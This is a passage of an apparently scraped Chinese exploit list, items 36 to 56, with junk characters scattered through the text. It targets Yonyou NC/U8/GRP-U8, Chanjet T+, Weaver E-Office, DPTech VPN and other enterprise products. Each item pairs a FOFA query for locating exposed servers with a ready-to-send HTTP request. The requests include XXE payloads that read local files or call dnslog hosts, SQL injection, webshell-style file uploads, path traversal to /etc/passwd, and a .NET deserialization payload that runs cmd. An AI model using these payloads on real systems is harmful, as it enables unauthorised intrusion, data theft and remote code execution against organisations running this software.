7 _3 ?6 ?( s, @Host: 203.25.218.166:88880 C: V: P y. M/ r+ T/ O
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info# r" u" q5 L2 _: Y2 Q
Accept-Encoding: gzip, deflate
2 T2 i' Y1 K' p1 tAccept: */*
+ g0 i+ _ `5 { F- i$ f6 ~Connection: close
K+ a! h+ G3 u4 P/ UaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
" \, M' _2 K* [8 x1 rContent-Length: 190
" Q1 s, M! i7 D! g( TContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
1 w! P' `! V$ `& l3 i4 X" a2 g. @( M7 N
--fd28cb44e829ed1c197ec3bc71748df0
7 W" R! U% a# Y: ^+ ZContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"8 D$ \( `- D! h& B3 Z
5 y9 s$ g R6 D" R4 M* @7 Y<%out.println(1111*1111);%>
8 d5 V! m, }2 z) T6 B--fd28cb44e829ed1c197ec3bc71748df0--! D" K# [7 w$ `5 U6 A5 v, x$ s) H- w
* n' i4 O8 ~! B+ \+ f# d
2 m9 k5 W) q$ E% X, g36. 用友NC-Cloud soapFormat XXE$ ?7 Z& b; o$ ?; @7 P1 f
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"$ `3 d. y3 S _
POST /uapws/soapFormat.ajax HTTP/1.1
" |! j7 F2 `' k( V( X5 O" J8 O* _6 LHost: 192.168.40.130:8989, y1 w5 W. _* \- ~) Q4 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.00 |1 J" l$ b" H* b( G; _$ O
Content-Length: 263; m+ E, X1 j- z0 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 p' f; m$ s: ?* y; H$ d" d; U
Accept-Encoding: gzip, deflate
( \2 Y: J& Z; _' E t4 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- u. i l9 Z* S6 R% a( {Connection: close7 F$ o# v& s) s( h: v& E
Content-Type: application/x-www-form-urlencoded) z% p" D( X+ M% N! ~' d
Upgrade-Insecure-Requests: 1. c/ e1 U2 f: y1 \7 L$ h$ A. `4 @
- |/ w5 N L C- f/ I; L- h; ?msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
* B8 X9 O- ^2 L5 k0 V# t
% |; S/ J( g1 b4 t" w! U, z& x& Z0 w% c4 Y9 ?# D w
37. 用友NC-Cloud IUpdateService XXE
( y t# v1 }6 k! a- i1 cFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
7 `1 R! [# M& J# h# p: ?+ gPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
/ }+ K, q& S; K( HHost: 192.168.40.130:89898 a! F. S1 z* y, X' h( O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36$ q, q( K. t* J, o
Content-Length: 421# r: [% h' Q- m4 C* A* j) M4 z' I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.93 N) e5 S" t, [# Z+ r9 C
Accept-Encoding: gzip, deflate
( x7 o" y) m+ h2 N/ _% CAccept-Language: zh-CN,zh;q=0.9
5 y7 d: B9 ^% d7 G1 }' hConnection: close" K7 S9 L( _8 D9 K
Content-Type: text/xml;charset=UTF-81 T7 D4 `6 {% ?: p/ {5 A
SOAPAction: urn:getResult1 a) z$ Z$ w$ w, M& |& l
Upgrade-Insecure-Requests: 1
% E0 @ N1 z1 h* Y/ w* ~
x: Z1 _: T; h4 B# s- z<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">4 C# r4 B9 v7 c+ w* z9 X
<soapenv:Header/>! F" b! \" m$ ^. [" J
<soapenv:Body>1 I& s/ P' _+ I A: V. G" X
<iup:getResult>
: \* o) I$ x# R. D5 _6 o1 _4 ]9 f9 g<!--type: string-->
! f& W4 a5 }6 ~$ o6 G7 k' _<iup:string><![CDATA[+ } m9 i% b% g- ?+ e2 r" j
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>: V, e: L- x/ e# y& e4 ]! R5 X. ]
<xxx/>]]></iup:string>2 I8 X9 N- q# @7 \8 C! t* {
</iup:getResult>! J8 n: ^ I+ \9 p* r
</soapenv:Body>5 ]/ Q+ |- C1 Y* [# C; g) h
</soapenv:Envelope># C |& ~/ I/ w8 `- C/ k" K
z/ d% c- H+ G; b2 x+ \& E
. p" k- l0 f7 b' [0 Q8 d( k
1 X7 y" u8 F: P3 j2 u0 @0 X6 b$ X
38. 用友U8 Cloud smartweb2.RPC.d XXE \5 U; @, v* ~1 M
FOFA:app="用友-U8-Cloud"$ o3 _/ X1 v' d e
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.11 K- t" P& ^! r( E( \# e9 R
Host: 192.168.40.131:8088
+ u { B9 k! n& GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25% {) Y& ^* W! V9 B# r# q
Content-Length: 260
0 v& |3 _- r! W9 H# W; z" IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
! f. K) e+ s D* A+ W! H q+ d G bAccept-Encoding: gzip, deflate) R& [3 m; {- w+ W
Accept-Language: zh-CN,zh;q=0.9
* \1 j, M" D4 r- rConnection: close
, t& O7 W. M& p! `Content-Type: application/x-www-form-urlencoded7 x' f/ d- G9 \9 C d
0 w2 J5 k# U u" M" b+ H _7 `
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
: y0 G8 c) ~3 d" y8 Y, h6 O3 Y
4 N \: c% e8 Z2 p; R( }1 f3 e1 g8 m% |3 G3 p; }
39. 用友U8 Cloud RegisterServlet SQL注入* B4 f6 H6 K Z% w
FOFA:title="u8c"$ i3 g8 @* J9 T* M9 j
POST /servlet/RegisterServlet HTTP/1.1
$ w" C* `6 _2 l" jHost: 192.168.86.128:80895 `" }+ V ]- \5 M; B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
$ P/ s) w0 }% }2 U. J) zConnection: close
8 B, ^/ F" R7 ]+ [! E5 G4 OContent-Length: 850 p& S7 v6 r1 C( m1 _; M
Accept: */*; o) X+ j' L, D; U0 `4 l
Accept-Language: en: f7 D( a9 ^6 ~% h( C0 Y7 `9 L U
Content-Type: application/x-www-form-urlencoded
( Q8 }$ z8 I1 c! p: FX-Forwarded-For: 127.0.0.1
2 s7 m0 l; I9 t: g3 I8 f# ]Accept-Encoding: gzip9 p U; G8 G5 l( E2 H: h! z
- a: l& H& ~" n2 @1 n4 `% ]" ?, K2 gusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--% k! \, |. m( e. Z3 u' s* P& W
' P1 Q% ^6 I6 p/ ]6 E
" [3 k& e6 [# ~; T9 W+ [/ G( c
40. 用友U8-Cloud XChangeServlet XXE- ^8 ~+ C" P ~" }1 u4 x
FOFA:app="用友-U8-Cloud"
6 \2 m% a, e3 |# ?POST /service/XChangeServlet HTTP/1.10 n- G3 L8 a( ~* J, b$ n: D+ {# m% ~6 U
Host: x.x.x.x5 g3 r3 o! p$ f+ ^5 S! M
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; g% v! H4 a; n+ Q0 a( c$ QContent-Type: text/xml
' B$ e6 p8 C) T1 o( R& gConnection: close
7 X& W! m# }# Y3 T; u2 |
1 ], g0 u x4 R& ?7 o9 d<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>* x, n$ K6 Y* p' ~" S; f- T5 J$ i
# k3 I" T% B4 r) D9 q8 C8 d$ |( o, r5 ?* D
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入" c& P6 c7 k# q/ P) M) k+ M3 _% Y
FOFA:app="用友-U8-Cloud"; v, d g" Z$ F1 g0 b5 Y( O+ I
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1 l4 ]2 }# b/ p
Host:
* u; p3 X9 g e3 D# f$ Y4 [9 r9 U8 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) l o5 m/ ~$ CContent-Type: application/json$ p* L9 s8 n# H3 u
Accept-Encoding: gzip
. ^8 z8 u- x. D. WConnection: close8 t- h3 M8 r3 G; \
1 l( n. a& ` |. W
\3 {/ V+ x! v4 \42. 用友GRP-U8 SmartUpload01 文件上传: a6 \ ~" X9 d9 J4 l0 ~
FOFA:app="用友-GRP-U8"
6 G: N( Z( Q" dPOST /u8qx/SmartUpload01.jsp HTTP/1.1, s; M( \, a$ _5 t( e- f
Host: x.x.x.x1 }9 F7 w2 k# n% I( T) }5 o8 ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
9 v4 \4 _0 t$ H; L9 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.363 ^0 |( q' ], K* q3 C9 B, `: f
+ z8 W% Y+ r1 E9 m7 ~4 Z: u
PAYLOAD/ S- k, G# F+ c
3 P! J3 W& h/ w! z a0 y
5 j% r. m( s" c8 nhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml' W+ r5 w+ F5 n2 g
! g9 G$ D2 l/ B3 l$ @, g% o) n% t
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
/ o+ S; V* U. y( \$ A( z2 }9 _* [FOFA:app="用友-GRP-U8"
; N9 Y" O& h' I0 {POST /services/userInfoWeb HTTP/1.12 G3 q# K% g+ ?/ U+ ~
Host: your-ip
9 Z5 c+ j& s4 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.366 X: M, X+ z3 J3 e5 {, r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- v% _1 ^- Z! m0 ^$ l$ d
Accept-Encoding: gzip, deflate+ ?, K: V) m/ C4 T
Accept-Language: zh-CN,zh;q=0.91 S8 d$ V' d: E* r+ D# ~" n
Connection: close6 c; H1 f+ w$ W6 X
SOAPAction:
3 }. u; l5 @' c0 C% EContent-Type: text/xml;charset=UTF-8
) j' _9 \8 c [" A- R# c; u+ X& w! n, W2 Q0 b- O
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
% o3 t% J1 C' O. { <soapenv:Header/>: B, E* c: u( \4 `, ?
<soapenv:Body>9 h- ]5 B/ F3 M# F$ z, M
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
, X* u4 v' u# ~; d9 Y5 L <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
1 x2 Q% b# _* G/ l, B </ser:getUserNameById>! C7 ?, \& H) C' d7 }$ x
</soapenv:Body>
) I# m+ Z& Y7 i3 @& @3 E6 A4 X0 w4 m6 I</soapenv:Envelope>
' ^0 i. O1 N! c2 O# B" k0 D
3 l# X& ^) \4 n) g; Z- H
* u! z, f0 T8 N! \1 W44. 用友GRP-U8 bx_dj_check.jsp SQL注入
3 D2 G2 c! I! F3 o5 E B- HFOFA:app="用友-GRP-U8"0 }4 X# J' v$ q
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
1 K0 s* k% ~1 `Host: your-ip
! O( ]6 I' @9 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36, e1 S# H8 D g) V- o; R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ H5 T( z( ]8 d+ m# S! V$ P
Accept-Encoding: gzip, deflate, X0 g- x* ^# V9 R9 v3 ^+ d
Accept-Language: zh-CN,zh;q=0.9 X/ {% X% ~. i$ m+ d! q/ ]& k
Connection: close$ A( r, E; E' [# M* ]$ _$ ?
9 S* e, E3 C" e
$ F$ B: R; r" U1 f- O; ~* e+ G45. 用友GRP-U8 ufgovbank XXE
- C2 m' k) M$ C, D b' VFOFA:app="用友-GRP-U8"2 D- Z/ Z+ K* B
POST /ufgovbank HTTP/1.1. r3 h0 b4 M' ]
Host: 192.168.40.130:222
1 e1 Q& G" a9 u% j. C- T0 O( A4 C9 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
4 I4 F( o p) r( DConnection: close
. w! K9 j% E6 \! U/ X ^Content-Length: 161
) z+ d- _; C) [- h" ?# c* Q4 h0 J) m1 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 K2 q! L# u% I ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ T( z6 e9 u: i9 t+ J+ GContent-Type: application/x-www-form-urlencoded
+ p o9 B: _0 v# Q/ O+ P" wAccept-Encoding: gzip
2 ]5 b. a) S' ^2 j' A5 G
2 C% x% t* T* h6 K+ areqData=<?xml version="1.0"?>
3 t4 G0 u/ E2 j. G" ^" i+ z* [<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
$ E; h0 k, P6 O* {, r5 n3 E1 o; n& `8 ~7 \' z: G1 x0 s
. [: e; D2 e# i) M( Y46. 用友GRP-U8 sqcxIndex.jsp SQL注入
0 p9 X. l1 C6 q& S. rFOFA:app="用友-GRP-U8": \4 ]6 ]8 E+ N! A2 \- [5 F* i
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1' E2 j9 K' ?8 m# ~- X2 U
Host: your-ip
4 U; H0 ~# f% h/ ~" a# TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
; u# t; u- Z/ ^8 m, VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 C$ `" f% V* j+ W" d& {9 ?3 b
Accept-Encoding: gzip, deflate3 \) x6 c" H4 b4 {( F1 u
Accept-Language: zh-CN,zh;q=0.9
4 c* g# @9 I8 i _1 s# WConnection: close& s& _6 O; R0 o2 K$ L: B
" U# q( L' I& q- H5 Z$ a3 J U( v. p/ C" [( ]
47. 用友GRP A++Cloud 政府财务云 任意文件读取
# d6 @, O. O \, B% u; ]( sFOFA:body="/pf/portal/login/css/fonts/style.css"# p' H/ \) ?. F/ l/ g3 H' e
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
, m. ?4 B W* B2 I: o% DHost: x.x.x.x h$ G& }2 c0 s( u
Cache-Control: max-age=08 @' ]" F( P+ z$ e2 t
Upgrade-Insecure-Requests: 1
0 [# O+ b, P2 `; ^, E! s K* vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( j- }6 i" Y1 F, q% I" V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) O3 C. z3 O( l4 A4 c% a" a$ I2 o1 M
Accept-Encoding: gzip, deflate, br5 a( r8 O! H1 u. r. e5 X4 U! ^- c
Accept-Language: zh-CN,zh;q=0.9$ P; H( i9 S1 V# `+ a D0 N
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT# r# w3 D- M* h% ?$ J; W) ?4 S
Connection: close
( N7 w6 h9 T% P+ K2 E' D* |& |, K8 I+ B/ {6 t9 z
# K! H3 W0 ^/ a) T0 p' B; U
% x/ X6 y4 o4 @: ]8 S# C, e
48. 用友U8 CRM swfupload 任意文件上传2 M" J5 H0 |8 M* I& K4 B
FOFA:title="用友U8CRM"* f/ d- [' @( {8 ]+ T+ B' h$ s
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1: p! G& ]4 p/ q/ o# z: H
Host: your-ip* N& E8 @2 p7 a5 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. Q7 y0 q. Z- |. @4 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* c8 \1 D3 S1 s* O& P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ H0 z0 g' m- K6 {Accept-Encoding: gzip, deflate9 M- F O/ h" }" }6 u/ n
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855& P: x, ^/ v# y& g3 Z2 _: Y* B. i
------269520967239406871642430066855! \ P* ?; v2 ^, }
Content-Disposition: form-data; name="file"; filename="s.php"
& I* z# a! [: H. ~12316 ~, O5 z$ Y a6 ]2 S& W
Content-Type: application/octet-stream2 K* J, j" Y; H7 j# }! R
------269520967239406871642430066855
% \1 \1 v1 j9 z: G% aContent-Disposition: form-data; name="upload"$ h- {& K0 o: X; r/ Z
upload
9 ]6 {' \; B, p------269520967239406871642430066855--
+ h& U& V7 N% O6 K$ J; u
, ~' b, z- {1 l; ]& A
/ g4 ]# `# _2 h1 g. s5 x# C x49. 用友U8 CRM系统uploadfile.php接口任意文件上传0 e8 J9 X4 N$ V# h
FOFA:body="用友U8CRM"3 t: }% ?' z/ S% Q
- V/ `0 U# h( R+ ]' C' K9 G
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
; @% ^* A# h$ `5 z% c2 f8 Z* pHost: x.x.x.x
7 m/ \. j3 v3 _8 q: M0 Q7 m. iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
, H% C+ \6 ]! H" o9 o% AContent-Length: 3297 N# F! `' r1 v6 K+ R- J8 h1 E, ]6 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& @/ v `. @: p/ h* d, w$ ]0 ]Accept-Encoding: gzip, deflate
" w$ M0 V: z Z4 u- @ @+ VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, L ]6 U' D* v; BConnection: close' Y1 Y- C3 d' R# n- w4 ]
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
1 G9 x, |7 T2 {% |( }
* _3 c( `+ {2 d: B3 C7 A) @-----------------------------vvv3wdayqv3yppdxvn3w
. j4 Q+ Y* Y& @5 z+ V1 v, [1 nContent-Disposition: form-data; name="file"; filename="%s.php "
/ f6 z: V1 P# S q& @* [% gContent-Type: application/octet-stream( o& K; l5 o% g
' F& A6 Y7 k3 {. b" X6 K2 o
wersqqmlumloqa. V$ G2 Y! x2 j
-----------------------------vvv3wdayqv3yppdxvn3w
; \! T8 t1 C/ K. i1 V \Content-Disposition: form-data; name="upload"
- R L+ {& k0 y" ]$ `9 @9 b
( a& j) U/ \5 r5 G cupload1 \0 p% [+ }! p- [& ~- \& y
-----------------------------vvv3wdayqv3yppdxvn3w--( K2 s% @3 [3 Z# _8 s
( T" ^9 t8 {) H" w" \; n' ^5 @ K0 b7 W
http://x.x.x.x/tmpfile/updB3CB.tmp.php
5 ]/ K7 R' i) _: v1 X. W" y, C- p
: `2 t" @) U* E4 P$ H50. QDocs Smart School 6.4.1 filterRecords SQL注入5 E f r+ d3 s* R
FOFA:body="close closebtnmodal"
& J( @" g: S: d, V! G8 G6 ZPOST /course/filterRecords/ HTTP/1.1
7 ~9 n+ J; m! L4 {1 dHost: x.x.x.x6 ~6 N) T m9 G' |- e: d# r+ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 H: o1 N8 Q9 K" O; C4 p& W- I
Connection: close
0 B8 ~8 `. q% m$ s- _5 E+ l" }Content-Length: 2248 {& P2 w( }1 I
Accept: */*& w0 H$ S: |1 m, |; v2 T
Accept-Language: en
* l* H/ X# }2 B6 e9 R! ]* { L* rContent-Type: application/x-www-form-urlencoded
6 T( G! N) U4 j! V3 RAccept-Encoding: gzip
3 S, d0 t+ J; W8 T+ G, K- f" c
+ O0 D$ F6 a# {. e6 Y9 m0 ksearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1; P- j- D* u6 @5 C
) {- m2 h& G. _/ e) N! r( t6 t' |" _. a2 _( n9 n" S+ q& F. m& K
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入' g; N& }: l2 z, g) I$ l
FOFA:app="云时空社会化商业ERP系统"
( A$ W# g) \+ w1 l6 P& RGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1& O2 q9 }5 i$ V
Host: your-ip
; ~* r! C$ x$ y9 ~+ d, eUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36/ d) r8 A) Y2 e* Q5 H# u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
8 i1 m' b/ l4 ?; `. L4 O/ {Accept-Encoding: gzip, deflate
( z6 ?1 M3 T' G* y6 X: g+ J# vAccept-Language: zh-CN,zh;q=0.9
* {, \6 W2 S' |4 E2 y! T( @+ B, `Connection: close: g$ E* d) f1 N& [4 c1 u
% _$ b4 @% Z/ F7 ^* T
2 X2 x% ~& E" r& [ P52. 泛微E-Office json_common.php sql注入
+ T" W2 U6 @, [! T$ E, T. N, M* YFOFA:app="泛微-EOffice"$ |# l2 Z9 \6 j+ K3 n
POST /building/json_common.php HTTP/1.1
. [ f; S" P1 S- tHost: 192.168.86.128:8097
* u6 x. Y% G0 }' NUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' `- R& l) E9 E/ R3 s! R
Connection: close
& u8 I$ L& n% i% M1 ?3 D0 M- y- vContent-Length: 87
7 m8 t2 x' d2 d4 [0 W" D. g1 s# rAccept: */*
6 S: A: @ m" S$ hAccept-Language: en" I" x! U* a# `. q
Content-Type: application/x-www-form-urlencoded1 W+ v+ Z3 |. c6 }" h5 @6 t4 y' I3 C
Accept-Encoding: gzip4 U# o' j1 s& ]5 u$ i5 V% G0 F
2 d3 m+ V N+ D4 \7 {& \tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
! i* m% |$ p9 g
6 G* o2 }0 F( n
, M6 s! Z2 N+ a% h1 x5 b53. 迪普 DPTech VPN Service 任意文件上传& Y% s& g) V( `% f' @9 u
FOFA:app="DPtech-SSLVPN"8 M3 Y" w2 C* a& S8 S* Y
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
+ C( \, O2 m7 x& o) F7 r4 P! t
( L; \$ m7 A% s6 n
" \" l& O4 H9 ^3 r4 Z( p9 }2 a54. 畅捷通T+ getstorewarehousebystore 远程代码执行
1 p0 f& b6 A& F! D1 V6 s: NFOFA:app="畅捷通-TPlus"
/ _1 h0 W- T% ~# Y7 {第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件1 E- u0 B$ Y0 J+ Q1 f
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% k! m g# a. W
- W% f* c. Y) E% Z& q
" L1 Y' G3 U' R( m4 H2 s+ d
完整数据包) B; i. Y/ o% v" }" O
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
' J( U# c O/ B4 s0 V% FHost: x.x.x.x
# Q- j4 D7 j3 _& yUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
" _4 L. `1 e2 j ^# `' FContent-Length: 593! }* [5 |+ D# E7 q6 ]
1 B9 [' V! |$ n; E: j% G{
' x5 o; X2 v4 y$ l1 F% d: ?- R" T"storeID":{
?- t! Y) H$ s+ m' I. ?8 Y7 F "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
* x7 ]1 ^7 [+ v: B5 M7 b A% u# X "MethodName":"Start", \( n# i, L, y5 Z: P
"ObjectInstance":{3 k3 I( N( B: \* U$ @* e
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",! U& o l& Z; I
"StartInfo":{
. k: ~8 `# t4 Y' R1 {5 U) I "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) m! K' B8 ^# l8 J( b( J* n- p( q
"FileName":"cmd",
8 l0 A( j6 p( Q9 g8 X "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
, q* w. v1 k/ C, A/ d }5 A, y) F% L+ ]9 Y* [* M
}
5 Y' Z* l9 w" j. e" H8 d }
+ A+ g" s3 M D. r: u}
2 @0 z2 s0 m0 A6 T9 ?4 ^9 j' k6 D; F
( |: D3 Z; A% @& A/ b g1 Z
第二步,访问如下url
) h0 Q% p- r9 [& Z1 P/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt' O7 Q1 A! r/ E
) Y1 }# J4 |9 F2 ] p* F
" W% w7 @) `5 m L! A. |+ s; o55. 畅捷通T+ getdecallusers信息泄露/ T& ^7 o% j! j$ v4 m
FOFA:app="畅捷通-TPlus": ^+ J6 R3 c$ e! x& z/ t
第一步,通过( m! w3 A% R4 C* P5 L- h4 k! b/ [- W
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie: C* g1 y/ \6 S
第二步,利用获取到的Cookie请求
1 k; b) \2 A8 z) U3 u1 P# m, s% A/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
8 s, b. W3 ~4 Q3 H! D( l. @5 K3 |4 {4 S% ?& m
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
3 X6 \8 ]& v& }4 NFOFA: app="畅捷通-TPlus"
# h# j6 p/ T, `# A9 u& WPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
